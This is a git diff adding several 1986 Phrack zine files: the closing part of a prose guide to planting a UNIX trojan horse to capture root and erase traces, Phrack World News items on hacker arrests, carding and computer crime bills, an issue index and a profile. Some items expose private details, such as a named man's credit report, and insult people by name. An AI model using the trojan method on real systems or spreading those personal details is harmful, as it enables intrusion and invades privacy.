+program (such as a game you're in the process of writing) that you
+ask individual people to run via mail or 'chatting' with them.  As I
+said, this 'test' program can bomb or print a phony error message after
+completing its task, and you will just tell the person "well, I guess
+it needs more work", wait until they log off, and then read whatever
+file of theirs that you've unlocked.  If your trojan horse program's
+sole purpose is to catch a specific user running it - such as the
+root or other high-powered user - you can put the code to do so
+in a program that will be run a lot by various users of the system.
+Your modification will remain dormant until he runs it.
+If you can't find the source to 'star trek' or whatever in C, just
+learn C and convert something from pascal.  It can't hurt to learn
+C as it's a great language.  We've just seen what it can do on a
+UNIX system.  Once you've caught the root (i.e. you can now modify
+the /etc/passwd file) remove the spurious code from your trojan horse
+program and you'll never be caught.
+
+That's it...if you have any questions or comments or you just want
+to bitch at me, call this system:
+
+The Matrix
+415/922-2008
+101 megs, IBM warezzz, 2400 baud, Phrack sub-board, etc.
+
+Lord British, I *dare* you to call.
+
+(>
+=========================================================================
diff --git a/phrack7/8.txt b/phrack7/8.txt
new file mode 100644
index 0000000..7a19c3b
--- /dev/null
+++ b/phrack7/8.txt
@@ -0,0 +1,267 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue 7, Phile 8 of 10
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                      *^=-> Phrack World News <-=^*                      PWN
+PWN                                                                         PWN
+PWN                             Issue VI/Part 1                             PWN
+PWN                                                                         PWN
+PWN                         Compiled and Written by                         PWN
+PWN                                                                         PWN
+PWN                            Knight Lightning                             PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Oryan QUEST Vs. Dan Pasquale                                      June 21, 1986
+----------------------------
+Yes, our buddy from the west coast is back in action, this time against Oryan
+QUEST.  Oryan QUEST was busted on April 6, 1986 (See PWN Issue IV Part 2), for
+hacking AT&T Mail, by the San Mateo Police Department and the FBI.  Because of
+legal technicalities, the charges were dropped but, Oryan's computer was
+confiscated and never returned.  He has since bought a new computer (IBM AT)
+and is now back among us.
+
+It is believed that someone (Dan Pasquale?) must have found Oryan's notebook
+which contained his passwords on to bulletin boards around the country.  One
+example of this is "The Radio Station Incident" (See PWN Issue IV Part 3) where
+a fake Oryan QUEST wandered the BBS and when questioned as to his legitimacy
+quickly dropped carrier.
+
+Most recently Oryan QUEST has been getting job offers in computer security.  He
+hasn't accepted any at this time.  Also he has been getting several calls from
+Dan Pasquale.  Dan wants Oryan's help to bust any and all hackers/phreaks.  Dan
+is very pissed these days because someone charged $1100.00 worth of Alliance
+Teleconferences to his phone bill and now he wants revenge.  He has stated that
+one of his main projects is to bust P-80, sysoped by Scan Man.  Dan Pasquale
+says that Scan Man works for a long distance communications carrier.  I
+personally think he has as much of a chance of busting P-80 Systems as a
+snowball staying frozen in a microwave.
+
+Lets face it, if John Maxfield and the other investigators haven't busted P-80
+yet, they never will...let alone some little police sergeant in California.
+Dan also added that he is going to "hose" Speed Demon Elite.  He claims that he
+is already a member of SDE and that its only a matter of time before he takes
+it down forever.  He also mentioned that he has placed a Dialed Number Recorder
+(DNR) on Radical Rocker's phone lines.   Furthermore, it was learned that Dan
+Pasquale managed to get an account on to The Underground, sysoped by Night
+Stalker.  It is unknown as to if Dan has anything to do with Night Stalker's
+bust.
+
+Dan Pasquale also said, "I will bust these hackers any way I can!"  To really
+understand what that statement means you would probably have to live in
+California.  What Pasquale was referring to was moving violations.  If you (a
+driver under 21) receive any type of moving violation, both your insurance
+company and your parents are notified.  This raises your insurance rates and
+gets you into trouble.  If you get two moving violations, kiss your license
+goodbye for at least 2 years.
+
+Radical Rocker having heard about Dan Pasquale's plans to destroy Speed Demon
+Elite, went on a user purge and has destroyed any and all accounts that were
+held by those that he did not know personally.   Speed Demon Elite is now a
+private BBS and supposedly Radical Rocker has now cleared things up with Dan
+Pasquale.
+            Information provided by Oryan QUEST and Radical Rocker
+_______________________________________________________________________________
+
+Marx and Tabas: The Full Story                                     July 1,1986
+------------------------------
+It all started with Cory Andrew Lindsly aka Mark Tabas, age 19.  He worked for
+the Colorado Plastic Card Company and had access to the plastic cards that
+credit cards were made with.  He had taken 1350 and stashed them away for later
+usage.
+
+His plan would have went perfectly if not for Steve Dahl.  He was busted in
+Miami by the US Secret Service for whatever reasons.  They gave him a chance to
+play ball.  Dahl had heard about Mark Tabas and Karl Marx's scheme and after
+informing the Secret Service about this he was given an embossing machine.
+Steve Dahl then flew to Denver and set up the meeting.  Mark Tabas lived in
+Denver and wanted his friend James Price Salsman aka Karl Marx, age 18, to join
+in on the fun.  So Marx flew down on a carded plane ticket that Tabas had
+signed for.
+
+The meeting took place in a room at the Denver Inn.  The room was bugged and 19
+cards (Visa, MasterCard, and some blanks) were made from a possible 140 that
+they had brought.  They decided to celebrate by ordering champagne on the card
+of Cecil R. Downing.
+
+A member of the Secret Service actually delivered the champagne to the room
+disguised as a waiter.  Tabas signed for the drinks and the twosome were
+nailed.  To make matters worse the SS also matched Tabas's signature with the
+signature used to buy the carded plane ticket.
+-------------------------------------------------------------------------------
+The sentencing goes like this:  Maximum: 10,000 dollars   (Local Law)
+                                Maximum: 250,000          (Federal Law)
+                                Maximum: 10 years in jail (both)
+
+                       Or any combination of the three.
+
+Both Tabas and Marx were let out on bail of five thousand dollars each.  The
+actually charge is:  The manufacturing and possession of unauthorized access
+devices.  The U.S. Magistrate Hilbert Schauer will be overhearing the case.
+
+There is a rumor that charges on Salsman were dropped and that he is in no
+trouble at all since he didn't actually buy the plane ticket, he was given it,
+he didn't steal the cards, and he didn't emboss them.  So supposedly the Secret
+Service let Marx go because he didn't know about the cards, he was just there
+at the wrong time.
+
+     Information Provided By The Denver Post and Sally Ride:::Space Cadet
+_______________________________________________________________________________
+
+The Saga Of Mad Hacker                                            July 15, 1986
+----------------------
+Mad Hacker of 616 NPA 616 wrote a random Compuserve hacker because he was bored
+and wanted something to do.  It ran constantly for about a week and was he
+surprised when it came up with an account.  However he made the mistake of not
+checking to see whose account it was, he used the SIG's (Special Interest
+Group's) and ran up a bill slightly under $300.
+
+About a month later he was living over at a friend's house and the owner of the
+account showed up, who just happened to be a family friend of the people that
+MH was staying with.  He asked both of them (the teenagers that is) if they
+were using his account (they all had Compuserve accounts and the family knew
+they were computer buddies).  Mad Hacker said no and truthfully meant it.
+
+Now around July 1, 1986 the account owner turned the matter over to the
+Kalamazoo Police Department since CIS (Compuserve) could not find anything out
+beyond the dialup used to access the account.  The police called around to
+everyone in the area ("everyone" meaning all the "real" hacks and phreaks, not
+rodents who think they're bad because they use handles) including Thomas
+Covenant and Double Helix.  Most of everyone instantly forgot that Mad Hacker
+ever existed, but somehow they got a hold of the phone number where he was
+staying (at the time he was staying at his girlfriend's house, he was not
+living there before) and contacted the owner of the account and put out a
+warrant for Mad Hacker's arrest.
+
+As of now, Mad Hacker faces *FELONY* charges because of the large amount of the
+bill.  The warrant for his arrest has been suspended, letting the account owner
+to handle things in his own way.  The owner has confiscated all of Mad Hacker's
+computer equipment (3 computers and hardware etc.) until the bill is completely
+paid back.
+
+Mad Hacker has progressed from merely delivering clever obscenities over the
+fone to his adversary to actual vengeance.  One example in the planning stages
+will be in the form of camping out in said account owner backyard (in a rural
+area), hooking up to a junction box, and running the account owner's Long
+Distance phone bill out of sight.
+
+Mad Hacker is supposed to have a file on Junction Box Modeming coming soon, he
+is currently borrowing a computer from a friend.
+
+                    Information Provided by Thomas Covenant
+_______________________________________________________________________________
+
+Lock Lifter *Busted*                                               July 2, 1986
+--------------------
+Lock Lifter was busted for hacking an MCI Vax.  he had downloaded a list of MCI
+Calling Cards that he later abused and in return he received a *free* DNR on
+his line for about 3 months.  He was also given a scare from MCI Investigations
+(for unknown reasons) previous to his visit from law enforcement officers and
+as such his BBS, The Black Chamber, was deleted and the userfiles were
+destroyed, so there really isn't much to worry about from the user's
+standpoint.
+
+Lock Lifter had been making plans to take his board down anyway, so being
+without The Black Chamber is just an adjustment we would have had to make
+eventually regardless of Lock Lifters bust.
+
+                            Information Provided By
+                 Arthur Dent/Cyclone II/Kerrang Khan/The Seker
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Some notes from Cheap Shades:
+
+"I was told by Arthur Dent that Lock Lifter did not have his computer anymore,
+but someone using LL's password called my AE, Metal Shop AE (for which he had
+lost his AE access but could still log on), and left me feedback in all caps
+(not like LL would do) that said something like  PLEASE GIVE ME ACCESS TO THE
+GO AE FUNCTION."  Arthur Dent has now confirmed that Lock Lifter did not make
+the call in question and that there is definitely a fed or someone with Lock
+Lifter's BBS passwords.  Sysops be warned.
+_______________________________________________________________________________
+
+Daniel Zigmond:  The Plot Thickens                                July 13, 1986
+----------------------------------
+Daniel Zigmond appeared, for a short time, on Pirate-80.  Scan Man let him on
+to make a statement and then shut him off the board.  It is now left to the
+users to decide whether or not he should be allowed back on.
+
+                    Information by Sally Ride:::Space Cadet
+
+Some sources say that we are seeing "Whacko Cracko" syndrome, where the story
+gets more and more bizarre as versions get modified.  Like TWCB, Zigmond
+supposedly says one thing to one person and something different to the next,
+depending on what he thinks they may want to hear.
+
+The following information was found under in an anonymous post on an unspecific
+bulletin board.  It would appear that someone performed a credit check on
+Daniel Zigmond (with TRW) and came up with some very interesting results.
+
+As many of you should know, TRW keeps records of all major transactions you
+make, credit cards you have, house or car payments, bank accounts you own, your
+job, and many other things.  Daniel Zigmond's TRW account is a little
+different, it has been flagged and the information is not there.   What it does
+show is that Daniel Zigmond holds the position of Staff Programmer at Carnegie
+Mellon University, a technical school in Pittsburgh, Pennsylvania.  It also
+shows that he was born in 1959 and although it would appear that he is 27,
+Daniel claims to be 26.  TRW lists his only bank account as being at the
+Pittsburgh National Bank.
+
+What this would mean is that Zigmond has never owned a car, never rented a car,
+never owned or rented a house, never had a credit card, never made any major
+transactions, and has only one bank account.
+
+During teleconferences on July 15th and 16th, several members of the PhoneLine
+Phantoms and myself questioned Zigmond about his TRW account and several other
+things.  Zigmond claims to know nothing about why his account is like this and
+up till we brought up the fact that he worked at CMU, he had been telling
+people that he was a reporter only.
+
+As far as his reasons for needing codes, passwords, etc...  He says its so his
+boss (whomever it will be) will believe the story.  Why shouldn't he believe
+it?  Haven't there been enough articles on hackers and phreakers in the past?
+Its been in the news very often and I'm sure that everyone remembers the
+Richard Sandza articles, "Night of The Hackers" and "Revenge of The Hackers"
+from Newsweek Magazine.
+
+Most recently Daniel Zigmond has been speaking with several members of the Neon
+Knights and he has obtained an account on the BBS World's Grave Elite, which is
+sysoped by Sir Gamelord, the Vice-President of the P.H.I.R.M.
+
+All hackers and phreaks are welcome to call him to be interviewed, although I
+advise against it.  Please do not call up to rag on him because it is
+pointless.  One example happened during the 2nd conference when someone called
+on Danny's other line.  They said "did we wake you up?"  Danny said "no" and
+then they hung up.
+
+                    Information Provided By Daniel Zigmond
+_______________________________________________________________________________
+
+TeleComputist; Subscribe Now!                                     July 25, 1986
+-----------------------------
+From:  Forest Ranger and TeleComputist staff,
+To:  You!
+
+TeleComputist has had a very positive response up to this time and we have
+received many requests for the free sample issue and now it is time to
+subscribe.
+
+For the sample free issue please self addressed stamped envelope with 39 cents
+postage to: TeleComputist Newsletter P.O. Box 2003 Florissant, Mo. 63032
+
+Also, please send subscriptions to the same address.  The subscription fee for
+the newsletter will be twelve dollars a year, fifty cents for back issues.
+This is a monthly circulation and we encourage letters.
+
+                  Information Provided by Telecomputist Staff
+
+                  Telecomputist Newsletter/BBS (314)921-7938
+
+[KL's notes:  Both Taran King and I have seen the first issue and it is damn
+good.  This is NOT a scam, we know the TeleComputist Staff personally and they
+will NOT rip you off.  The newsletter itself is of fine quality both in its
+print and content.  The sample issue was merely a shadow of the upcoming issues
+and it will continue to get better as time goes on. It is definitely worth the
+twelve dollars for the year subscription.]
+_______________________________________________________________________________
diff --git a/phrack7/9.txt b/phrack7/9.txt
new file mode 100644
index 0000000..7918607
--- /dev/null
+++ b/phrack7/9.txt
@@ -0,0 +1,295 @@
+                                ==Phrack Inc.==
+
+                      Volume One, Issue 7, Phile 9 of 10
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                      *^=-> Phrack World News <-=^*                      PWN
+PWN                                                                         PWN
+PWN                             Issue VI/Part 2                             PWN
+PWN                                                                         PWN
+PWN                         Compiled and Written by                         PWN
+PWN                                                                         PWN
+PWN                            Knight Lightning                             PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+U.S. Telecom Retiring Uninet                                       May 26, 1986
+----------------------------
+                            "Uninet is coming down"
+
+Reston, Va. - U.S. Telecom Data Communications Company, Uninet Packet Switching
+Network will be retired as a result of the proposed merger of the company with
+GTE Telenet Communications Corporation.
+
+The move came to light last week as a joint transition study team completed a
+plan detailing how the two companies will be merged.  The merger is a result of
+a joint venture spawned by the two companies parents, GTE Corporation and
+United Talecommunications Inc.
+
+The packet switches and related equipment which make up Uninet will be sold
+where possible, but a good deal of the equipment is likely to be discarded, a
+spokesman for the joint venture said.
+
+Under the plan, the capacity of GTE Telenet Packet Switching Network will be
+increased to handle additional traffic resulting from transference of U.S.
+Telecom customers to Telenet, according to the spokesman.
+
+The study groups considered integrating Uninet and Telenet because the external
+interfaces of each network are compatible but the internal protocols each
+network uses for functions such as networks management are substantially
+different and any attempt toward integration would require a massive
+development effort, spokesman said.
+
+Moving Uninet's traffic to Telenet is far cheaper.  Telenet currently supports
+six times as much traffic as Uninet, which means Telenet's capacity must only
+be incremented by one sixth.
+
+Uninet will be phased out over a 120 day transition period, to begin when the
+joint venture is approved.  The merger plan calls for all personnel of U.S.
+Telecom and GTE Telenet to be offered jobs with U.S. Sprint (now called U.S.
+Sprint, not Sprint/U.S. Telecom company since recent merger).  The new company
+is headquartered in Reston, Virginia where GTE Telenet is currently
+headquartered.  Submitted by Scan Man to Phrack Inc. From Communications Week,
+May 26 Issue
+_______________________________________________________________________________
+
+                                 P-80 Newsfile
+                                 -------------
+Computer Crime Bill Amended                                        May 14, 1986
+----------------------------
+After three years of Congressional hearings, the U.S. House of Representatives
+is finally getting ready to act on a computer crime bill, but like everything
+else in Congress many different people have input, and the focus and scope of
+pending computer crime bills have changed in important ways during the past few
+months.
+
+When bills are altered significantly, they are often written as "clean bills"
+and given new numbers.  Computer crime measures are changing so fast it is
+difficult to keep track of them.
+
+What started out as The Counterfeit Access Device and Computer Fraud Act (HR
+1001) became late last month The Computer Fraud and Abuse Act (HR 4562) which,
+although it has retained the same title, is now dubbed HR 4718 following the
+addition of some minor amendments.
+
+The new bill, sponsored by Rep. William Hughes (D-N.J.), is very similar to the
+old one, however, and would impose severe penalties for illegally accessing
+government and financial computers and crack down on illegal computer bulletin
+board systems.
+
+For more information on HR 4718, check the menu for bills in the US House of
+Representatives in the Legislation Database.
+
+                    Information Provided by Cathryn Conroy
+-------------------------------------------------------------------------------
+House Committee Approves New Computer Crime Bill                   May 14, 1986
+------------------------------------------------
+The House Judiciary Committee has approved and sent to the full House a new
+computer crime bill that would impose severe penalties for illegally accessing
+government and financial computers and crack down on illegal computer bulletin
+board systems.
+
+The bill (HR 4718), sponsored by Rep. William Hughes (D-N.J.), was passed by
+voice vote with no objection. It is aimed at closing loopholes in existing law
+and at helping to eliminate the "national malaise" of computer crime, Hughes
+said.
+
+The bill "will enable us to much more effectively deal with the emerging
+computer criminal in our society," said Hughes, who chairs the House crime
+subcommittee.
+
+Rep. Bill McCollum (R-Fla.), the ranking Republican on the crime subcommittee,
+added his support for the bill. He said it is time the nation began cracking
+down on computer criminals.
+
+"We demand privacy, yet we glorify those that break into computers," McCollum
+said, citing films and television shows that have painted a sympathetic
+portrait of computer criminals.
+
+The committee agreed to a single amendment to the bill -- one that would extend
+the list of computer systems protected by the measure to include those run by
+the brokers and dealers regulated by the Securities and Exchange Commission.
+McCollum, who sponsored the amendment, said the brokers and dealers provide
+some of the same services as banks and should receive equal protection against
+computer trespassers.
+
+The bill was reported out unanimously from the crime subcommittee. Hughes said
+an identical companion measure is moving through the Senate and that he expects
+the bill will become law before the end of the 99th Congress in December.
+Hughes and McCollum agreed that the bill will help eliminate another glaring
+example of the failure of existing federal law to keep pace with technological
+advances.
+
+"For the most part," he said, "our laws are rooted in the concept of property
+crimes, where someone trespasses into or steals another person's property.
+"With computer crimes, the trespassing or theft is done electronically, not
+physically," he added.  "Although the losses are often just as great or even
+greater than property crime, our laws are not current enough to keep pace with
+the changing technology used by the criminals."
+
+Hughes was the author of the nation's first computer crime law in 1984. That
+bill established a new federal crime for unauthorized access to classified
+information in government computers and a misdemeanor for accessing any federal
+computer or computer containing financial or credit information.  The new
+measure would establish a:
+
+-:- New felony for trespassing into federal interest computers, those run by or
+    for the federal government, banks or states. Offenders would face five-year
+    prison terms.
+
+-:- Second felony for "maliciously trespassing" into a federal interest
+    computer and causing more than $1,000 in damage.
+
+-:- New category of federal misdemeanors involving the use of illegal BBSes to
+    post private information, such as credit card data, phone account
+    information and passwords.
+
+"We need to establish clear guidelines for protecting the information stored in
+computers and for cracking down on those who knowingly put computers to
+criminal of malicious use," Hughes said.
+
+                       Information Provided by J. S. Orr
+-------------------------------------------------------------------------------
+Access To Government Computers Clarified                           June 9, 1986
+----------------------------------------
+Sen. Charles McC. Mathias (R- Md.) has introduced a bill in the U.S. Senate
+that would amend Section 1030 of Title 18 of the United States Code with the
+purpose of clarifying coverage with respect to access to computers operated for
+or on behalf of the federal government.
+
+The legislation would clearly impose penalties on anyone who modified,
+destroyed or prevented use of information in a government computer system or
+who used or disclosed individually identifiable information in such a computer.
+The bill has been referred to the Senate Committee on The Judiciary.  No
+subcommittee has yet been assigned.
+
+                    Information Provided by Cathryn Conroy
+_______________________________________________________________________________
+
+Tap Interviews II...by Dead Lord                                  July 14, 1986
+--------------------------------
+The infamous Dead Lord is back and this time with an anonymous rag file that he
+entitled Tap Interviews II to start people thinking that the Infiltrator had
+written it.  Lets look at this file in parts.
+
+First Dead Lord starts out by saying that he is Infiltrator and then changes
+his mind and becomes Sharp Razor (who is supposedly in prison).  His first
+interview was an imaginary exchange of words between him and Lex Luthor of the
+Legion Of Doom.  The interview also was used to rag on Infiltrator by the way
+it was presented.
+
+Dead Lord then decided to interview Executive Hacker of Chief Executive
+Officers (CEO).  The funny part about this interview is that Executive Hacker
+is another handle used by Dead Lord.  The only rag mentioned was that Executive
+Hacker didn't know that Ultima IV had been released and that there were only
+two members in CEO.  Dead Lord then goes on to say, "LOD is a group of
+egotistical fools..."
+
+Then started the straight rags without the interview crap.  This is where ole
+Dead Lord gives his opinion on eFerything.  For the first few paragraphs he
+rags on The Doctor, SpecElite, pirates in general, Monty Python, and The Flying
+Circus BBS.
+
+Then he starts giving descriptions of the people who attend the weekly TAP
+meetings:
+
+  "Cheshire is a tired old man, Broadway Hacker, who is an obnoxious slob
+   anyway, stopped going, the "950 codes kids" Ninja NYC and his pals have
+   mostly moved on, though Ninja NYC still attends.  Ninja NYC is, at 17 years
+   old, a complete criminal, the guy has stolen everything you can think of..."
+
+  "Two Sigmund Frauds also attend (they are partners) one is a skinny asshole
+   who has an earing and the other I never spoke to, but he is he one who
+   supposedly does all the BBS calling.  There is also some friend of Ninja's
+   who works for Northern Telcom."
+
+  "There is some young guy with a French accent who always smiles, and some
+   middle aged fag who is always talking.  Then there is MARK!  Ye Mark, though
+   he tries to be friendly, people try to stay away.  He works at a Camera..."
+   "He is slightly (very) unbalanced mentally, and always very confused.  He is
+   teased constantly but tolerated."
+
+  "There are also a few less important people, such as "Sid" some greasy kid
+   who is proud to have had a $1700+ fone bill because he thought he was using
+   a diverter.  Right now, they are generally a motley bunch.  Also they get
+   kicked out of restaurants frequently now, and are down to meeting at Burger
+   King.  <SIGH>  How pitiful..."
+
+After all of the above bullshit, he talks about Lord Digital, his "cult," and
+his adventures with Paul Muad'Dib.  Dead Lord still had more to say though, he
+decided to bring up Monty Python again as well as Phrack, TWCB, Stronghold
+East, Private Sector, and 2600 Magazine.  All of what he had to say was
+completely bogus and Dead Lord claimed to be a member of Metal Shop Private,
+although he called it Metal Shop Elite, which is untrue.  Fact is he was never
+a member, not even on the old MSP.  He also claims that he has submitted
+articles for Phrack, but was turned down because they were original files. Best
+bet is that whatever he was writing, he didn't know what he was talking about.
+
+Some notes to Dead Lord, as far as why Taran King was in the hospital; First
+off it was a psychiatric ward not a "hospital".  Second, why don't you go and
+read PWN 5-1 for the real story of what happened.  Third, the cosysop of
+Stronghold East is not the Slayer, it is Slave Driver.
+
+The truth is that both MSP and SE refused to let Dead Lord on and he holds a
+grudge.  He then went on to say that both 2600 Magazine and Private Sector
+sucked and that they always have.  Of course I am sure that Dead Lord could
+easily put out a better magazine then either/or 2600 and Phrack Inc., and he of
+course has shown that he can run a better BBS than Private Sector or Metal Shop
+Private.  He ragged on several other bulletin boards such as Inner View and
+Speed Demon Elite.
+
+After all of that he comes back to the subject of Legion of Doom, starts on
+Tribunal of Knowledge, and the says why Chief Executive Officers is better.
+
+  "LOD's main claim to fame is that Lex Luthor types up shitloads of manuals
+   and plasters LOD all over them.  Getting published in 2600 every other month
+   probably helps also."
+
+  "Another emerging group CEO, isn't as ridiculous as LOD, I mean the members
+   [all two of them] know a lot, and write intelligent stuff..."
+
+  "Executive Hacker and Corporate Criminal, not much of a group even if these 2
+   do stack up better than the entire LOD."
+
+His last rags were on Adventurer's Tavern and Disk Rigger.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Most of you by now are probably wondering how we tracked him down.  Well for
+starters Dead Lord made it a lot easier on us by deciding to mention that he
+lived in NYC.  He also talked a lot about others in the NYC area.  Dead Lord is
+a member of Draco Tavern.  Dead Lord was refused access to Metal Shop Private
+and Stronghold East.  Dead Lord's file was refused for Phrack Inc.  The
+clincher however was in finding that Dead Lord was actually Executive Hacker,
+and I'm sure that many of you noticed that CEO, the group the Executive Hacker
+belongs to, was highlighted and not ragged on.
+
+Some other interesting things about Dead Lord include that fact that he started
+a rumor in New York City, that Taran King had appeared on a talk show dealing
+with hackers and the he is responsible for giving out Sigmund Fraud's and Ninja
+NYC's numbers to Daniel Zigmond and he probably has given him other numbers as
+well.
+
+It has been said that Dead Lord's phone number has been disconnected by outside
+sources several times in the past and that the entire TAP Meeting attendees
+group is out to cause him major physical damage.
+_______________________________________________________________________________
+
+Quicknotes
+----------
+MOB RULES was indited on five counts of wire fraud by the secret service, the
+charges dated back to 1984.  This is supposedly part of the reason that the
+Marauder took down Twilight Zone, but this is pure rumor.
+-------------------------------------------------------------------------------
+More talk about Broadway Hacker being a REAL fed or fed informant has sprung
+up.  We at PWN are looking for factual evidence that this is true.
+-------------------------------------------------------------------------------
+Night Stalker, sysop of the Underground, was busted for something dealing with
+Transference of Funds.  It is unknown as to if Dan Pasquale had anything to do
+with this bust.  Credit Card numbers were frequently found here as well.  His
+phone line is being tapped and he cannot really discuss his bust to much.  He
+is also under constant surveillance wherever he goes.  Look for a full story
+in Phrack World News VII.
+-------------------------------------------------------------------------------
+The rumor that Carrier Culprit was busted is untrue, but he did receive a call
+from AT&T Security, regarding Alliance Teleconferencing Services.
+_______________________________________________________________________________
diff --git a/phrack8/1.txt b/phrack8/1.txt
new file mode 100644
index 0000000..f6ddb2a
--- /dev/null
+++ b/phrack8/1.txt
@@ -0,0 +1,27 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #1 of 9
+
+                                     Index
+
+         Welcome to the long-awaited Phrack Inc. Issue 8.  I'm quite sorry for
+all of the delays, but it's time to go back to school and it's been a hectic
+summer.  Unfortunately, over the summer, Fatal Error of 617 died in a
+motorcycle accident.  He was the sysop of Metropolis Elite and was around a
+while back.  This issue is released in memory of him, regardless of any
+personal opinions.
+
+                                                 Taran King
+                                        Sysop of Metal Shop Private
+
+Contents:
+#1  Phrack Inc. Index by Taran King (1k)
+#2  Phrack Pro-Phile V on Tuc by Taran King (6k)
+#3  City-Wide Centrex by The Executioner (14k)
+#4  The Integrated Services Digital Network by Dr. Doom (18k)
+#5  The Art of Junction Box Modeming by Mad Hacker 616 (6k)
+#6  Compuserve Info by Morgoth and Lotus (8k)
+#7  Fun with Automatic Tellers by The Mentor (7k)
+#8  Phrack World News VII Part I by Knight Lightning (25k)
+#9  Phrack World News VII Part II by Knight Lightning (26k)
+===============================================================================
diff --git a/phrack8/2.txt b/phrack8/2.txt
new file mode 100644
index 0000000..f5ebc3f
--- /dev/null
+++ b/phrack8/2.txt
@@ -0,0 +1,130 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #2 of 9
+
+                            ==Phrack Pro-Phile V==
+
+                       Written and Created by Taran King
+
+                                 June 25, 1986
+
+Welcome to Phrack Pro-Phile V.  Phrack Pro-Phile is created to bring
+information to you, the users, about old or highly important/controversial
+people.  This month, I bring to you one of the most influential users of our
+times and of days of old...
+
+                                      TUC
+                                      ~~~
+
+Tuc is the sysop of RACS III (TUCBBS), a telecom enthusiasts' bulletin board in
+Stony Point, N.Y. (914).
+-------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: Tuc
+           Call him: Scott Jeffrey Ellentuch
+       Past handles: None
+      Handle origin: Nickname in high school derived from teachers calling him
+                     EllenTOUCH, EllenTOOK, and his corrections were phrased
+                     "TUCK!"
+      Date of Birth: 10/10/65
+Age at current date: 20-1/2 years old
+             Height: 6'3-1/2"
+             Weight: About 195 lbs.
+          Eye color: Brown
+         Hair Color: Black
+          Computers: TRS Model I, then, 2 Atari 800's, then, countless Apple
+                     II+'s, then, finally, 1 IBM PC.
+  Sysop/Co-Sysop of: RACS III (TUCBBS), Phreak Advisor: Sherwood Forest II
+
+-------------------------------------------------------------------------------
+Tuc started out in the BBS world in July 1980 when he first got his modem, a
+Novation Acoustic.  In August of 1981, Connection-80 of Stony Point, his first
+bulletin board, was launched into the BBS world.  It started on a TRS-80 Model
+I, Epson MX-80 printer, 2 single density disk drives, a Novation Acoustic
+modem, and a home built auto-answer module.  At the time, he didn't even know
+what phreaking was, so it was a general public board.  A software switch to
+RACS III occurred on January 10, 1982, running until January 10, 1985. The hard
+drive arrived a few months ago to build it to the board that it currently is.
+
+Members of the elite world which he has met include King Blotto, Lex Luthor,
+Dr. Who, Crimson Death, The Videosmith, Jester Sluggo, The Sprinter, Mark
+Tabas, BIOC Agent 003, Agrajag, Telenet Bob, Big Brother, Cheshire Catalyst,
+Egyptian Lover, Magnetic Surfer, Paul Muad'Dib, Lord Digital, Sir Knight, 2600
+Editor (Emanuelle Goldstein [sp.]), Susan Thunder, Modem Rider, Sharp Razor,
+Hertz Tone, The Flying Avocado, and The Ace.
+
+His phreak experience began in March of 1982 through the new board's software
+having a section called "Phreak-80".  People started calling and paying
+attention to it, including one caller by the name of Susan Thunder, which is
+how he personally began to phreak.  She lead him around the scene which
+included the infamous 8 BBS and to other people such as Larry Kelly.  Some of
+the memorable phreak boards he was on included 8 BBS, MOM, OSUNY, The Private
+414 Board (as in THE 414's), Blottoland, The Connection, L.O.D., Plovernet,
+Pirate 80, Sherwood Forest I, II, and III, WOPR, IROC, Pirate Trek, Pirate's
+I/O, Datanet, Stalag 13, A.I. Labs, and Hell Phrozen Over.  He gives credit
+for his phreak knowledge to Susan Thunder and the people that she put him in
+touch with.
+
+Tuc's work is as a computer and communications security freelance consultant.
+He's done lots of programming in basic for the TRS-80, and assembly language
+for the IBM 370.
+
+Tuc does hack and phreak, but with his employer's consent.  Tuc attends the TAP
+meetings in New York occasionally, but in the past he was a regular.  He's
+attended all Phreak-Con's, he was an assistant editor of the original TAP, and
+was a pioneer in the phreak world before blue boxing and Alliance
+Teleconferencing was common knowledge.  Besides that, he was the one on West
+57th Street labeled "Scott Jeffrey Ellentuch".  He was hard to find on that
+particular program.
+
+Tuc has been involved with various groups in his lifetime including (in the
+order that he joined them) The Warelords, The Knights of Shadow, Apple Mafia,
+and, at the same time as Apple Mafia, Fargo 4A.
+
+-------------------------------------------------------------------------------
+
+Interests: Telecommunications (modeming, phreaking, hacking), martial arts
+           (weaponry), radio controlled cars and airplanes, and video games.
+
+Tuc's Favorite Things
+---------------------
+
+       Women: A quiet evening with the girlfriend.
+        Cars: MG-TD Kit Car.
+       Foods: Anything vegetarian.
+       Music: The Hooters, and any band he worked for.
+     Leisure: Having just a "good old time".
+
+Most Memorable Experiences
+--------------------------
+
+Car ride with 8 phreaks in Tuc's VW Super Beetle at a Phreak Con.
+The Fargo 4A stunt (getting all Fargo, N.D. DA's to go home).
+
+Some People to Mention
+----------------------
+
+Susan Thunder (for getting him started)
+All those that helped him while he was coming up in the world (too many to
+                                                               mention)
+
+-------------------------------------------------------------------------------
+
+Tuc is 150% against credit carding.  He thinks that is out and out criminal
+activity, something that is totally against the code of ethics of phreaking and
+hacking.  He also doesn't appreciate the fighting between phreaks that occurs
+so often in the phreak world today.  He thinks the modern community is
+crumbling.
+
+-------------------------------------------------------------------------------
+
+I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in
+the near future.  And now for the regularly taken poll from all interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  No names mentioned, but yes, a few of
+the ones he has met are computer geeks.  Thank you for your time, Tuc.
+
+                                            Taran King
+                                   Sysop of Metal Shop Private
diff --git a/phrack8/3.txt b/phrack8/3.txt
new file mode 100644
index 0000000..375e0d9
--- /dev/null
+++ b/phrack8/3.txt
@@ -0,0 +1,272 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #3 of 9
